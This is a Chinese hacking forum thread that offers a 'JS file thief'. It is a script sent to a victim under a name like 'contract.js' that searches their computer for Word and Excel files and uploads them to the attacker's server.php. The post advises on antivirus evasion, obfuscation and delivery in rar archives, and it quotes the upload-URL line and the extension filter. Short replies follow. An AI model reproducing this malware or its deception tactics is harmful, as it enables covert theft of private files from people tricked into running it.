0 人签到
    搜索
    Hi~登录注册
    查看: 43|回复: 2
    收起左侧

    【社工辅助】js文件小偷【下载链接失效】

    [复制链接]

    5

    主题

    0

    精华

    3 小时

    在线时间

    新手上路

    Rank: 1

    积分
    3
    发表于 7 天前 | 显示全部楼层 |阅读模式
    主要用在交互式社工时,需要得到被社目标电脑上的一些文件时。分客户端和服务端两份。是js文件,不是exe。(过360全套无提示)自动搜索目标电脑上指定的扩展名的文件,上传到服务器。(默认是doc和xls之类的,需要什么文件可以自行修改,一共也没几行代码)优点是个头小,而且不是exe文件,现在exe文件太敏感,还有在全过程360没有提示。(金山猎豹会提示在上传文件)修改过脚本后自己用js加密工具加密一下隐密性还凑合,容易获得信任,js在不懂的人眼里是不知道是什么,半懂不懂的人认为是无害的,图标又长的像文本文件,起个“合同书.js”发过去,我发现成功率很高,比直接发EXE靠谱的多。缺点嘛,通过QQ传送依然会被重命名,要把js后缀的重命名去掉,所以推荐用rar压缩包发送,js不是常见扩展名,还有就是功能简陋,就这一个功能,哪位大牛修改了弄的更好了希望能共享一下。用法很简单了,把server.php放到网上,建立个uploads目录,发js文件给别人,然后等会儿去uploads目录看。(具体看代码吧,很简单的。)
    server.php放在服务器web目录


    这里可以修改文件存放目录


    scan.js发给被攻击者


    [AppleScript] 纯文本查看 复制代码
    var __POSTURL__ = 'http://www.baidu.com/server.php';`### js第一行的这段代码里面修改你web域名或者ip都行
    
    if (/\.(doc|docx|xls|xlsx)$/i.test(FileList<i>)) {`## js地54行这里是可以修改长传文件后缀名的 txt什么的都行

    最后就是吧文件发给需要社工的人让他双击就ok了
    效果图
    【社工辅助】js文件小偷【下载链接失效】
    游客,如果您要查看本帖隐藏内容请回复









    上一篇:迅雷X去广告方法
    下一篇:js小偷改进版,可获取QQ、微信号,可获取账号密码隐私照...
    回复

    使用道具 举报

    7

    主题

    0

    精华

    56 小时

    在线时间

    新手上路

    Rank: 1

    积分
    23
    发表于 6 天前 | 显示全部楼层
    不懂怎么操作
    回复 支持 反对

    使用道具 举报

    13

    主题

    3

    精华

    50 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    51
    发表于 昨天 09:16 AM | 显示全部楼层
    看上去很有用的东东,谢谢分享~
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表